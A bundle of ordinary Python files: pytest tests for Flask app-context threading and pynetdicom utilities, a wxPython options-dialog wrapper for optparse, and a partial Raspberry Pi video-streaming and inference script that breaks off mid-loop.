with flask_app.test_client() as client:
result = client.get(TEST_URL)
assert result.get_json() == TEST_RESULT
mock_action.action.assert_called_with(TEST_G)
def test_running_without_flask_context():
"""Test running AppContextThread outside of flask app raises an error."""
mock_action = Mock()
with pytest.raises(RuntimeError):
thread = AppContextThread(target=lambda: mock_action.action())
thread.start()
thread.join()
mock_action.action.assert_not_called()
def test_app_context_executor(flask_app):
"""Test accessing flask.g from another thread with futures."""
mock_action = Mock()
@flask_app.route(TEST_URL)
def test_handler():
g.test = TEST_G
with ThreadPoolWithAppContextExecutor(max_workers=2) as pool:
future = pool.submit(lambda: mock_action.action(g.test))
future.result()
return jsonify(TEST_RESULT)
with flask_app.test_client() as client:
result = client.get(TEST_URL)
assert result.get_json() == TEST_RESULT
mock_action.action.assert_called_with(TEST_G)
def test_executor_running_without_flask_context():
"""Test running ThreadPoolWithAppContextExecutor without flask."""
mock_action = Mock()
with pytest.raises(RuntimeError):
with ThreadPoolWithAppContextExecutor(max_workers=2) as pool:
future = pool.submit(lambda: mock_action.action())
future.result()
mock_action.action.assert_not_called()
def test_executor_trasnfers_exceptions_to_calling_thread(flask_app):
"""Test the executor trasfers raised exceptions to the calling thread."""
def raises():
raise RuntimeError("foo")
@flask_app.route(TEST_URL)
def test_handler():
g.test = TEST_G
with ThreadPoolWithAppContextExecutor(max_workers=1) as pool:
future1 = pool.submit(raises)
future2 = pool.submit(lambda: 42)
with pytest.raises(RuntimeError):
future1.result()
future2.result()
return jsonify(TEST_RESULT)
with flask_app.test_client() as client:
result = client.get(TEST_URL)
assert result.get_json() == TEST_RESULT
|
test_utils.py
|
"""Unit tests for the pynetdicom.utils module."""
from io import BytesIO
from threading import Thread
import logging
import sys
import pytest
from pydicom.uid import UID
from pynetdicom import _config, debug_logger
from pynetdicom.utils import (
pretty_bytes, validate_uid, make_target, set_uid, decode_bytes
)
from .encoded_pdu_items import a_associate_rq
#debug_logger()
REFERENCE_GOOD_AE_STR = [
('a', b'a '),
('a b', b'a b'),
('a b', b'a b '),
(' b', b'b '),
(' ab c ', b'ab c '),
(' ab c ', b'ab c '),
('ABCDEFGHIJKLMNOPQRSTUVWXYZ', b'ABCDEFGHIJKLMNOP')
]
REFERENCE_GOOD_AE_BYTES = [
(b'a', b'a '),
(b'a b', b'a b'),
(b'a b', b'a b '),
(b' b', b'b '),
(b' ab c ', b'ab c '),
(b' ab c ', b'ab c '),
(b'ABCDEFGHIJKLMNOPQRSTUVWXYZ', b'ABCDEFGHIJKLMNOP')
]
REFERENCE_BAD_AE_STR = [
' ', # empty, 16 chars 0x20
'', # empty
'AE\\TITLE', # backslash
'AE\tTITLE', # control char, tab
'AE\rTITLE', # control char, carriage return
'AE\nTITLE', # control char, new line
u'\u0009'.encode('ascii'), # \t
u'\u000A'.encode('ascii'), # \n
u'\u000C'.encode('ascii'), # \x0c
u'\u000D'.encode('ascii'), # \x0d
u'\u001B'.encode('ascii'), # \x1b
u'\u005C'.encode('ascii'), # \\
u'\u0001'.encode('ascii'), # \x01
u'\u000e'.encode('ascii'), # \x0e
1234,
45.1,
]
REFERENCE_BAD_AE_BYTES = [
b' ', # empty, 16 chars 0x20
b'', # empty
b'AE\\TITLE', # backslash
b'AE\tTITLE', # control char, tab
b'AE\rTITLE', # control char, carriage return
b'AE\nTITLE', # control char, new line
u'\u0009'.encode('ascii'), # \t
u'\u000A'.encode('ascii'), # \n
u'\u000C'.encode('ascii'), # \x0c
u'\u000D'.encode('ascii'), # \x0d
u'\u001B'.encode('ascii'), # \x1b
u'\u005C'.encode('ascii'), # \\
u'\u0001'.encode('ascii'), # \x01
u'\u000e'.encode('ascii'), # \x0e
1234,
45.1,
]
REFERENCE_UID = [
# UID, (enforced, non-enforced conformance)
# Invalid, invalid
('', (False, False)),
(' ' * 64, (False, False)),
('1' * 65, (False, False)),
('a' * 65, (False, False)),
# Invalid, valid
('a' * 64, (False, True)),
('0.1.2.04', (False, True)),
('some random string', (False, True)),
# Valid, valid
('1' * 64, (True, True)),
('0.1.2.4', (True, True)),
]
class TestValidateUID:
"""Tests for utils.validate_uid()."""
def setup(self):
self.default_conformance = _config.ENFORCE_UID_CONFORMANCE
def teardown(self):
_config.ENFORCE_UID_CONFORMANCE = self.default_conformance
@pytest.mark.parametrize("uid,is_valid", REFERENCE_UID)
def test_validate_uid_conformance_true(self, uid, is_valid):
_config.ENFORCE_UID_CONFORMANCE = True
assert validate_uid(UID(uid)) == is_valid[0]
@pytest.mark.parametrize("uid,is_valid", REFERENCE_UID)
def test_validate_uid_conformance_false(self, uid, is_valid):
_config.ENFORCE_UID_CONFORMANCE = False
assert validate_uid(UID(uid)) == is_valid[1]
class TestPrettyBytes:
"""Tests for utils.pretty_bytes()."""
def test_parameters(self):
"""Test parameters are correct."""
# Default
bytestream = a_associate_rq
result = pretty_bytes(bytestream)
assert len(result) == 14
assert isinstance(result[0], str)
# prefix
result = pretty_bytes(bytestream, prefix='\\x')
for line in result:
assert line[:2] == '\\x'
# delimiter
result = pretty_bytes(bytestream, prefix='', delimiter=',')
for line in result:
assert line[2] == ','
# items_per_line
result = pretty_bytes(bytestream, prefix='', delimiter='',
items_per_line=10)
assert len(result[0]) == 20
# max_size
result = pretty_bytes(bytestream, prefix='', delimiter='',
items_per_line=10, max_size=100)
assert len(result) == 11 # 10 plus the cutoff line
result = pretty_bytes(bytestream, max_size=None)
# suffix
result = pretty_bytes(bytestream, suffix='xxx')
for line in result:
assert line[-3:] == 'xxx'
def test_bytesio(self):
"""Test wrap list using bytesio"""
bytestream = BytesIO()
bytestream.write(a_associate_rq)
result = pretty_bytes(bytestream, prefix='', delimiter='',
items_per_line=10)
assert isinstance(result[0], str)
class TestMakeTarget:
"""Tests for utils.make_target()."""
def test_make_target(self):
"""Context Setup"""
from contextvars import ContextVar
foo = ContextVar("foo")
token = foo.set("foo")
"""Test for ``_config.PASS_CONTEXTVARS = False`` (the default)."""
assert _config.PASS_CONTEXTVARS is False
def target_without_context():
with pytest.raises(LookupError):
foo.get()
thread_without_context = Thread(target=make_target(target_without_context))
thread_without_context.start()
thread_without_context.join()
"""Test for ``_config.PASS_CONTEXTVARS = True``."""
_config.PASS_CONTEXTVARS = True
def target_with_context():
assert foo.get() == "foo"
thread_with_context = Thread(target=make_target(target_with_context))
thread_with_context.start()
thread_with_context.join()
_config.PASS_CONTEXTVARS = False
"""Context Teardown"""
foo.reset(token)
@pytest.fixture
def utf8():
"""Add UTF-8 as a fallback codec"""
_config.CODECS = ('ascii', 'utf8')
yield
_config.CODECS = ('ascii', )
class TestSetUID:
"""Tests for utils.set_uid()"""
def test_str(self):
"""Test str -> UID"""
uid = set_uid('1.2.3', 'foo')
assert isinstance(uid, UID)
assert uid == '1.2.3'
def test_bytes(self):
"""Test bytes -> UID"""
b = '1.2.3'.encode('ascii')
assert isinstance(b, bytes)
uid = set_uid(b, 'foo')
assert isinstance(uid, UID)
assert uid == '1.2.3'
def test_bytes_decoding_error(self, caplog):
"""Test invalid bytes raises exception"""
b = '1.2.3'.encode('utf_32')
assert isinstance(b, bytes)
msg = (
r"Unable to decode 'FF FE 00 00 31 00 00 00 2E 00 00 00 32 00 00 "
r"00 2E 00 00 00 33 00 00 00' using the ascii codec\(s\)"
)
with caplog.at_level(logging.ERROR, logger='pynetdicom'):
with pytest.raises(ValueError, match=msg):
set_uid(b, 'foo')
assert (
"'ascii' codec can't decode byte 0xff in position 0"
) in caplog.text
def test_uid(self):
"""Test UID -> UID"""
uid = set_uid(UID('1.2.3'), 'foo')
assert isinstance(uid, UID)
assert uid == '1.2.3'
def test_invalid_raises(self, caplog):
"""Test invalid UID raises exception"""
with caplog.at_level(logging.ERROR, logger='pynetdicom'):
bad = 'abc' * 22
msg = (
f"Invalid 'foo' value '{bad}' - must not exceed 64 characters"
)
with pytest.raises(ValueError, match=msg):
uid = set_uid(bad, 'foo')
assert isinstance(uid, UID)
assert uid == bad
assert msg in caplog.text
def test_no_validation(self, caplog):
"""Test skipping validation"""
with caplog.at_level(logging.WARNING, logger='pynetdicom'):
uid = set_uid('abc' * 22, 'foo', validate=False)
assert isinstance(uid, UID)
assert uid == 'abc' * 22
assert not caplog.text
def test_valid_non_conformant_warns(self, caplog):
"""Test a valid but non-conformant UID warns"""
with caplog.at_level(logging.WARNING, logger='pynetdicom'):
uid = set_uid('1.2.03', 'foo')
assert isinstance(uid, UID)
assert uid == '1.2.03'
assert "Non-conformant 'foo' value '1.2.03'" in caplog.text
def test_none_allowed(self):
"""Test None -> None"""
uid = set_uid(None, 'foo', allow_none=True)
assert uid is None
def test_none_disallowed(self):
"""Test None raises exception"""
msg = "'foo' must be str, bytes or UID, not 'NoneType'"
with pytest.raises(TypeError, match=msg):
set_uid(None, 'foo', allow_none=False)
def test_empty_passthrough(self):
"""Test an empty value passes through validation"""
uid = set_uid('', 'foo')
assert uid == UID('')
uid = set_uid(b'', 'foo')
assert uid == UID('')
uid = set_uid(UID(''), 'foo')
assert uid == UID('')
def test_empty_raises(self):
"""Test empty raises exception"""
msg = r"Invalid 'foo' value - must not be an empty str"
with pytest.raises(ValueError, match=msg):
set_uid('', 'foo', allow_empty=False)
class TestDecodeBytes:
"""Tests for utils.decode_bytes"""
def test_decoding_error(self, caplog):
"""Test decoding error raises and logs"""
b = '1.2.3'.encode('utf_32')
with caplog.at_level(logging.ERROR, logger='pynetdicom'):
msg = (
r"Unable to decode 'FF FE 00 00 31 00 00 00 2E 00 00 00 32 "
r"00 00 00 2E 00 00 00 33 00 00 00' using the ascii codec\(s\)"
)
with pytest.raises(ValueError, match=msg):
decode_bytes(b)
assert (
"'ascii' codec can't decode byte 0xff in position 0"
) in caplog.text
def test_decoding_error_fallback(self, caplog, utf8):
"""Test decoding error raises and logs"""
b = '1.2.3'.encode('utf_32')
with caplog.at_level(logging.ERROR, logger='pynetdicom'):
msg = (
r"Unable to decode 'FF FE 00 00 31 00 00 00 2E 00 00 00 32 "
r"00 00 00 2E 00 00 00 33 00 00 00' using the ascii, "
r"utf8 codec\(s\)"
)
with pytest.raises(ValueError, match=msg):
decode_bytes(b)
assert (
"'ascii' codec can't decode byte 0xff in position 0"
) in caplog.text
assert (
"'utf-8' codec can't decode byte 0xff in position 0"
) in caplog.text
|
needswx.py
|
import sys, os, os.path, fnmatch, types, threading, time
import re, copy, io, csv, math, json
from optparse_gui import OptionParser, UserCancelledError, Progress
import optparse
from configparser import ConfigParser
import wx
from wx.lib.filebrowsebutton import FileBrowseButton
def quotedifnec(f):
if ' ' in f:
return '"%s"'%f
return f
def quotedlistifnec(lf):
retval = []
for f in lf:
retval.append(quotedifnec(f))
return " ".join(retval)
class MyFileBrowseButton( FileBrowseButton ):
def __init__(self,*args,**kw):
if 'dotfile' in kw:
self.dotfile = kw['dotfile']
del kw['dotfile']
if 'key' in kw:
self.key = kw['key']
del kw['key']
self.isdir = False
if 'isdir' in kw:
self.isdir = kw['isdir']
del kw['isdir']
super(MyFileBrowseButton,self).__init__(*args,**kw)
def createDialog( self, parent, id, pos, size, style, name="" ):
"""Setup the graphic representation of the dialog"""
wx.Panel.__init__ (self, parent, id, pos, size, style, name )
self.SetMinSize(size) # play nice with sizers
box = wx.BoxSizer(wx.HORIZONTAL)
# self.label = self.createLabel( )
# box.Add( self.label, 0, wx.CENTER )
self.textControl = self.createTextControl()
box.Add( self.textControl, 1, wx.CENTER, 5)
self.browseButton = self.createBrowseButton()
box.Add( self.browseButton, 0, wx.LEFT|wx.CENTER, 5)
self.SetAutoLayout(True)
self.SetSizer( box )
self.Layout()
if type( size ) == tuple:
size = wx.Size(*size)
self.SetSize(-1, -1, size.width, size.height, wx.SIZE_USE_EXISTING)
def OnBrowse (self, event = None):
""" Going to browse for file... """
current = self.GetValue()
s = io.StringIO(current)
rr = csv.reader(s,delimiter=' ',quotechar='"',quoting=csv.QUOTE_MINIMAL)
try:
row = next(rr)
except StopIteration:
row = []
if len(row) > 0 and os.path.exists(row[0]):
directory,current = os.path.split(row[0])
if len(row) > 1:
current = []
for r in row:
current.append(os.path.split(r)[1])
current = ' '.join(map(quotedifnec,current))
current = ""
elif hasattr(self,'dotfile') and self.dotfile:
config=ConfigParser()
if os.path.exists(self.dotfile):
config.read(self.dotfile)
if config.has_section("LastFolder") and config.has_option("LastFolder",self.key):
directory = config.get("LastFolder",self.key)
else:
directory = self.startDirectory
current = ""
else:
directory = self.startDirectory
current = ""
if self.isdir:
dlg = wx.DirDialog(self, self.dialogTitle, directory,
self.fileMode)
else:
dlg = wx.FileDialog(self, self.dialogTitle, directory, current,
self.fileMask, self.fileMode)
if dlg.ShowModal() == wx.ID_OK:
s = io.StringIO()
wr = csv.writer(s,delimiter=' ',quotechar='"',quoting=csv.QUOTE_MINIMAL)
if self.fileMode&wx.FD_MULTIPLE:
wr.writerow(dlg.GetPaths())
dir = os.path.split(dlg.GetPaths()[0])[0]
else:
wr.writerow([dlg.GetPath()])
dir = os.path.split(dlg.GetPath())[0]
self.SetValue(s.getvalue().strip())
s.close()
if hasattr(self,'dotfile') and self.dotfile:
config=ConfigParser()
if os.path.exists(self.dotfile):
config.read(self.dotfile)
if not config.has_section("LastFolder"):
config.add_section("LastFolder")
config.set("LastFolder",self.key,dir)
try:
wh = open(self.dotfile,'w')
config.write(wh)
wh.close()
except IOError:
pass
dlg.Destroy()
class OptparseDialog( wx.Dialog ):
'''The dialog presented to the user with dynamically generated controls,
to fill in the required options.
Based on the wx.Dialog sample from wx Docs & Demos'''
def __init__(
self,
option_parser, #The OptionParser object
parent = None,
ID = 0,
title = 'Program Options',
pos=wx.DefaultPosition,
size=wx.DefaultSize,
style=wx.DEFAULT_DIALOG_STYLE,
name = 'OptparseDialog',
values = None,
args = False
):
self.option_parser = option_parser
if values == None:
values = option_parser.get_defaults()
provider = wx.SimpleHelpProvider()
wx.HelpProvider.Set(provider)
wx.Dialog.__init__(self)
self.SetExtraStyle(wx.FRAME_EX_CONTEXTHELP)
self.Create(parent, ID, title, pos, size, style)
sizer = wx.BoxSizer(wx.VERTICAL)
sizer2 = wx.BoxSizer(wx.HORIZONTAL)
top_label_text = '%s %s' % ( option_parser.get_prog_name(),
option_parser.get_version() )
label = wx.StaticText(self, -1, top_label_text)
sizer2.Add(label, 0, wx.GROW|wx.ALIGN_LEFT|wx.ALL, 5)
if wx.Platform != "__WXMSW__":
sizer2.AddStretchSpacer(-1)
btn = wx.ContextHelpButton(self)
sizer2.Add(btn, 0, wx.ALL)
sizer.Add(sizer2,0, wx.GROW|wx.ALL, 5)
line = wx.StaticLine(self, -1, size=(20,-1), style=wx.LI_HORIZONTAL)
sizer.Add(line, 0, wx.GROW|wx.RIGHT|wx.TOP|wx.LEFT, 5)
nb = wx.Notebook(self, wx.ID_ANY)
self.option_controls = {}
self.option_controls.update(self.set_panel(nb,option_parser.option_list,values,'Options'))
for g in option_parser.option_groups:
self.option_controls.update(self.set_panel(nb,g.option_list,values,g.title))
if args:
self.args_ctrl = self.set_args_panel(nb,values,'Arguments')
else:
self.args_ctrl = None
sizer.Add(nb, 0, wx.GROW|wx.RIGHT|wx.TOP|wx.LEFT, 5)
line = wx.StaticLine(self, -1, size=(20,-1), style=wx.LI_HORIZONTAL)
sizer.Add(line, 0, wx.GROW|wx.RIGHT|wx.TOP|wx.LEFT, 5)
btnsizer = wx.BoxSizer(wx.HORIZONTAL)
btn = wx.Button(self, wx.ID_CANCEL)
# btn.SetHelpText("The OK button completes the dialog")
btnsizer.Add(btn,0,wx.ALL,5)
btnsizer.AddSpacer(100)
btn = wx.Button(self, wx.ID_CLEAR, label="Reset")
btn.Bind(wx.EVT_BUTTON, self.closeDialog)
btnsizer.Add(btn,0,wx.ALL,5)
btnsizer.AddSpacer(100)
btn = wx.Button(self, wx.ID_OK)
btn.SetDefault()
# btn.SetHelpText("The Cancel button cancels the dialog.")
btnsizer.Add(btn,0,wx.ALL,5)
sizer.Add(btnsizer, 0, wx.ALIGN_CENTER,wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5)
self.SetSizer(sizer)
sizer.Fit(self)
def closeDialog(self,event):
self.state = 'Reset'
self.Close()
def set_panel(self,parent,opts,values,title):
nopt = len(opts)
s = wx.FlexGridSizer(2)
p = wx.Panel(parent, -1)
parent.AddPage(p,title)
p.SetSizer(s)
return self.add_opts(opts,values,p,s)
def set_args_panel(self,parent,values,title):
s = wx.FlexGridSizer(1,2)
p = wx.Panel(parent, -1)
parent.AddPage(p,title)
p.SetSizer(s)
label = wx.StaticText(p, -1, 'Arguments' )
label.SetHelpText( 'Free-form arguments.' )
ctrl = wx.TextCtrl( p, -1, '', size = ( 300, 100 ),
style=wx.TE_MULTILINE | wx.TE_PROCESS_ENTER )
ctrl.SetHelpText(
'''Args can either be separated by a space or a newline
Args that contain spaces must be entered like so: "arg with sapce"
'''
)
ctrl.Value = values['-args-']
s.Add( label, 0, wx.ALIGN_RIGHT | wx.ALL, 5 )
s.Add( ctrl, 1, wx.ALIGN_LEFT | wx.ALL, 5 )
return ctrl
def add_opts(self,opts,values,parent,sizer):
controls = {}
for option in opts:
if option.dest is None:
continue
if option.help is None:
option.help = ''
if option.name is None:
option.name = option.dest.title()
label = wx.StaticText(parent, -1, option.name )
label.SetHelpText( option.help )
sizer.Add( label, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT|wx.ALL, 5 )
if 'file' == option.type:
if not option.filetypes:
fileMask = 'All Files|*.*'
else:
fileMask = '|'.join([ "%s (%s)|%s"%(nm,ft,ft) for nm,ft in option.filetypes])
ctrl = MyFileBrowseButton(parent, -1,
size=(300, -1),
fileMode=wx.FD_OPEN|wx.FD_FILE_MUST_EXIST,
fileMask=fileMask,
startDirectory=os.getcwd(),
dotfile=self.option_parser.dotfile,
key=option.dest,
initialValue=str(values.get(option.dest,"")))
sizer.Add( ctrl, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5)
elif 'files' == option.type:
if not option.filetypes:
fileMask = 'All Files|*.*'
else:
fileMask = '|'.join([ "%s (%s)|%s"%(nm,ft,ft) for nm,ft in option.filetypes])
if isinstance(values.get(option.dest,""),str):
initStr = values.get(option.dest,"")
else:
initStr = str(' '.join(v if ' ' not in v else '"%s"'%v for v in values.get(option.dest,[])))
ctrl = MyFileBrowseButton(parent, -1,
size=(300, -1),
fileMode=wx.FD_OPEN|wx.FD_MULTIPLE|wx.FD_FILE_MUST_EXIST,
fileMask=fileMask,
startDirectory=os.getcwd(),
dotfile=self.option_parser.dotfile,
key=option.dest,
initialValue=initStr)
sizer.Add( ctrl, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5)
elif 'savefile' == option.type:
if not option.filetypes:
fileMask = 'All Files|*.*'
else:
fileMask = '|'.join([ "%s (%s)|%s"%(nm,ft,ft) for nm,ft in option.filetypes])
ctrl = MyFileBrowseButton(parent, -1,
size=(300, -1),
fileMode=wx.FD_SAVE|wx.FD_OVERWRITE_PROMPT,
fileMask=fileMask,
startDirectory=os.getcwd(),
dotfile=self.option_parser.dotfile,
key=option.dest,
initialValue=str(values.get(option.dest,"")))
sizer.Add( ctrl, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5)
elif 'savedir' == option.type:
ctrl = MyFileBrowseButton(parent, -1,
size=(300, -1),
fileMode=wx.DD_DEFAULT_STYLE,
startDirectory=os.getcwd(),
dotfile=self.option_parser.dotfile,
key=option.dest,isdir=True,
initialValue=str(values.get(option.dest,"")))
sizer.Add( ctrl, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5)
elif 'dir' == option.type:
ctrl = MyFileBrowseButton(parent, -1,
size=(300, -1),
fileMode=wx.DD_DEFAULT_STYLE|wx.DD_DIR_MUST_EXIST,
startDirectory=os.getcwd(),
dotfile=self.option_parser.dotfile,
key=option.dest,isdir=True,
initialValue=str(values.get(option.dest,"")))
sizer.Add( ctrl, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5)
elif 'store' == option.action:
if 'choice' == option.type:
if optparse.NO_DEFAULT == option.default:
option.default = option.choices[0]
ctrl = wx.ComboBox(
parent, -1, choices = option.choices,
style = wx.CB_DROPDOWN | wx.CB_READONLY,
size=(300,-1)
)
try:
ind = option.choices.index(values.get(option.dest,None))
except (ValueError,KeyError):
ind = 0
ctrl.Select(ind)
elif 'multichoice' == option.type:
if sys.platform == 'win32':
perentry = 13
pergap = 0
top = 5
bottom = 0
ysize = min(len(option.multichoices),5)*perentry + \
(min(len(option.multichoices),5)-1)*pergap + top + bottom
else:
perentry = 22
pergap = 3
ysize = min(len(option.multichoices),5)*perentry + \
(min(len(option.multichoices),5)+1)*pergap
ctrl = wx.ListBox(
parent, -1, choices = option.multichoices,
style = wx.LB_EXTENDED | \
wx.LB_HSCROLL | wx.LB_NEEDED_SB,
size = (300,ysize)
)
# print >>sys.stderr, values.get(option.dest),option.multichoices
selected = values.get(option.dest,[])
if isinstance(selected,str):
selected = selected.split(',')
for val in selected:
try:
ind = option.multichoices.index(val)
# print >>sys.stderr, val, ind
ctrl.Select(ind)
except ValueError:
continue
else:
if option.text:
ctrl = wx.TextCtrl( parent, -1, "", size = ( 300, 100 ),
style=wx.TE_MULTILINE | wx.TE_PROCESS_ENTER )
elif option.type == 'password':
ctrl = wx.TextCtrl( parent, -1, "", size=(300,-1),
style=wx.TE_PASSWORD )
else:
ctrl = wx.TextCtrl( parent, -1, "", size=(300,-1) )
if option.dest in values:
ctrl.Value = str( values[option.dest] )
sizer.Add( ctrl, 0, wx.ALIGN_LEFT|wx.ALL, 5 )
elif option.action in ( 'store_true', 'store_false' ):
ctrl = wx.CheckBox( parent, -1, "", size = ( 300, -1 ) )
if option.dest in values:
ctrl.Value = values[option.dest]
sizer.Add( ctrl, 0, wx.ALIGN_LEFT|wx.ALL, 5 )
ctrl.SetHelpText( option.help )
controls[ option ] = ctrl
return controls
def _getOptions( self ):
option_values = {}
for option, ctrl in self.option_controls.items():
if option.type == 'multichoice':
option_values[option] = ','.join([option.multichoices[i] for i in ctrl.GetSelections()])
else:
option_values[option] = ctrl.GetValue()
return option_values
def _getArgs( self ):
if self.args_ctrl == None:
return []
args_buff = self.args_ctrl.Value
args = re.findall( r'(?:((?:(?:\w|\d)+)|".*?"))\s*', args_buff )
return args
def getOptionsAndArgs( self ):
'''Returns the tuple ( options, args )
options - a dictionary of option names and values
args - a sequence of args'''
option_values = self._getOptions()
args = self._getArgs()
return option_values, args
class EmptyNotNoneOptionError (optparse.OptionError):
"""
Raised if a notNone option has no value.
"""
class UserCheckOptionError (optparse.OptionError):
"""
Raised if a user supplied values check fails.
"""
class OptionParserGUI( OptionParser ):
def __init__( self, *args, **kwargs ):
if wx.GetApp() is None:
self.app = wx.App( False )
self.args = False
if 'args' in kwargs:
self.args = kwargs['args']
del kwargs['args']
dotfile = None
if 'dotfile' in kwargs:
dotfile = kwargs['dotfile']
del kwargs['dotfile']
OptionParser.__init__( self, *args, **kwargs )
self.dotfile = self.find_dotfile(dotfile)
def find_dotfile(self,base=None):
if not base:
base = self.get_prog_name()
if 'HOMEPATH' in os.environ and 'HOMEDRIVE' in os.environ:
home = os.environ['HOMEDRIVE'] + os.environ['HOMEPATH']
elif 'HOME' in os.environ:
home = os.environ['HOME']
else:
raise RuntimeError("Can't find home directory!")
if base.endswith('.exe'):
dotfile = base[:-4]+'.ini'
elif base.endswith('.py'):
dotfile = base[:-3]+'.ini'
else:
dotfile = base+'.ini'
return os.path.join(home,"."+dotfile)
def parse_args( self, args = None, values = None, opts = None ):
'''
This is the heart of it all - overrides optparse.OptionParser.parse_args
@param arg is irrelevant and thus ignored,
it\'s here only for interface compatibility
'''
if opts != None:
initvals = {}
for g,o in self.iteropts():
# print repr(g),repr(o),o.dest
if o.dest and hasattr(opts,o.dest):
initvals[o.dest] = getattr(opts,o.dest)
set_values = initvals
else:
set_values = None
if opts == None:
config=ConfigParser()
if os.path.exists(self.dotfile):
config.read(self.dotfile)
if not config.has_section("VERSION") or config.get("VERSION","VERSION") != self.version:
os.unlink(self.dotfile)
config=ConfigParser()
if config.has_section("LastValue"):
for g,o in self.iteropts():
if o.dest and o.remember and config.has_option("LastValue",o.dest):
if set_values == None:
set_values = {}
value = json.loads(config.get("LastValue",o.dest))
if o.type == 'multichoice':
set_values[o.dest] = value.split(',')
elif o.type in ('savefile','savedir','file'):
set_values[o.dest] = quotedifnec(value)
elif o.type in ('files',):
set_values[o.dest] = quotedlistifnec(value)
else:
set_values[o.dest] = value
good = False
while not good:
good = True
dlg = OptparseDialog( option_parser = self, values = set_values, args = self.args )
dlg.state = None
dlg_result = dlg.ShowModal()
if dlg_result == wx.ID_CANCEL and dlg.state == None:
raise UserCancelledError( 'User has canceled' )
if dlg_result == wx.ID_CANCEL and dlg.state == 'Reset':
good = False
if os.path.exists(self.dotfile):
os.unlink(self.dotfile)
set_values = None
continue
assert dlg_result == wx.ID_OK
if values is None:
values = self.get_default_values()
option_values, args = dlg.getOptionsAndArgs()
set_values = {'-args-':''}
for option, value in option_values.items():
set_values[option.dest] = value
if dlg.args_ctrl:
set_values['-args-'] = dlg.args_ctrl.Value
optmap = {}
for option in self.option_list:
optmap[str(option)] = option
for gr in self.option_groups:
for option in gr.option_list:
optmap[str(option)] = option
for option, value in option_values.items():
if option.action in ('store_true','store_false'):
setattr( values, option.dest, value )
continue
if option.takes_value() is False:
value = None
if isinstance(value,str):
value = str(value)
if option.notNone and (value == None or value == ''):
self.error("%s: notNone option is empty"%(option,),
option,exit=False)
good = False
break
try:
option.process( option, value, values, self )
except optparse.OptionValueError as e:
self.error(e.msg,option,exit=False)
good = False
break
config=ConfigParser()
if os.path.exists(self.dotfile):
config.read(self.dotfile)
if not config.has_section("LastValue"):
config.add_section("LastValue")
if not config.has_section("VERSION"):
config.add_section("VERSION")
config.set("VERSION","VERSION",self.version)
for g,o in self.iteropts():
if o.remember:
if getattr(values,o.dest) not in (None,""):
config.set("LastValue",o.dest,json.dumps(getattr(values,o.dest)))
else:
config.remove_option("LastValue",o.dest)
try:
wh = open(self.dotfile,'w')
config.write(wh)
wh.close()
except IOError:
pass
return values, args
def error( self, msg, option=None, exit=True):
msg = re.sub(r"u'","'",msg)
if ':' in msg:
msg = msg.split(':',1)[1].strip()
if option:
msg = option.name+": "+msg
dlg = wx.MessageDialog( None, msg, 'Error!', wx.ICON_ERROR )
dlg.ShowModal()
if exit:
sys.exit(2)
return
class ProgressGUI(Progress):
def __init__(self,title,*args,**kwargs):
super(ProgressGUI,self).__init__(*args,**kwargs)
self.title = title
self.dialog = None
self.lock = threading.Lock()
def init(self,message):
if wx.GetApp() is None:
self.app = wx.App( False )
if self.dialog:
return
args = (self.title,message+" "*(60-len(message)), 1001)
t = threading.Thread(target=self.start, args=args)
t.start()
while True:
self.lock.acquire()
if self.dialog:
self.lock.release()
break
self.lock.release()
time.sleep(1)
def start(self,*args):
self.lock.acquire()
self.dialog = wx.ProgressDialog(style=0,*args)
self.lock.release()
def initprogressbar(self, message):
self.init(message)
self.updateprogressbar(0)
# self.dialog.Update(0,message)
def initbar(self, message):
self.init(message)
self.updatebar()
# self.dialog.Update(0,message)
def updateprogressbar(self,value):
self.dialog.Update(value)
def updatebar(self):
self.dialog.Pulse()
|
rpc_video_h264_streaming.py
|
import time
from queue import Queue
from data_sender import send
import argparse
from threading import Thread, Event
import cv2
import numpy as np
from redis import Redis
import pickle
import torch
from models import TSN
from baseline_rpc_rgb import make_ucf, make_infer, make_hmdb
from sklearn.metrics import confusion_matrix
import os
#### DEVIVCE ####
def streaming():
while True:
with picamera.PiCamera() as camera:
camera.resolution = (224, 224)
camera.framerate = 40
camera.start_recording('./device-video/1.h264')
camera.wait_recording(2)
counter = 1
while True:
counter += 1
camera.split_recording('./device-video/%d.h264' % counter)
camera.wait_recording(2)
camera.stop_recording()
#### DEVICE ####
def data_send():
counter = 0
while True:
LIST_DIR = os.listdir('./device-video')
SORTED_DIR = [ int(x.split('.')[0]) for x in LIST_DIR]
SORTED_DIR.sort()
SORTED_DIR = [ str(x) + '.h264' for x in SORTED_DIR]
LENGTH = len(LIST_DIR)
if LENGTH > 1 and LENGTH > counter:
item = SORTED_DIR[counter]
PATH = os.path.join('/home/pi/venv/video', item)
read_file = open(PATH, 'rb')
encoding = read_file.read()
if encoding != b'':
send('Frame', encoding)
counter += 1
#### HUB ####
def receive_and_save(rgb_net, redis):
counter = 1
frames_to_run = []
while True:
initial_time = time.time()
if redis.llen('Frame') > 0:
start_redis = time.time()
incoming_video = redis.lpop('Frame')
stop_redis = time.time()
print("TYPE OF FRAME: ", type(incoming_video), "Popping Time: ", stop_redis-start_redis)
start_load = time.time()
video = pickle.loads(incoming_video)
end_load = time.time()
f = open('./video/%d.h264'%counter, 'wb+')
opened = time.time()
f.write(video)
write_file = time.time()
#f.write(video.encode('utf-8'))
print("[Pickle Loading Time: ]", end_load-start_load)
print("[Video Open Time: ]", opened-end_load)
print("[Video Write Time: ]", write_file - opened)
counter += 1
#### HUB ####
def read_file_and_run():
counter = 0
while True:
LIST_DIR = sorted(os.listdir('./video'))
SORTED_DIR = [ int(x.split('.')[0]) for x in LIST_DIR]
SORTED_DIR.sort()
SORTED_DIR = [ str(x) + '.h264' for x in SORTED_DIR ]
LENGTH = len(LIST_DIR)
if LENGTH > 1 and LENGTH > counter:
item = SORTED_DIR[counter]
PATH = os.path.join('./video', item)
start_capture = time.time()
cap = cv2.VideoCapture(PATH)
end_capture = time.time()
print("[VIDEO CAPTURE OF ", item, end_capture-start_capture)
counter += 1
tmp_stack_frames = []
before_opening_cap = time.time()
while cap.isOpened():
ret, frame = cap.read()
new_frame = time.time()
if ret == True:
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
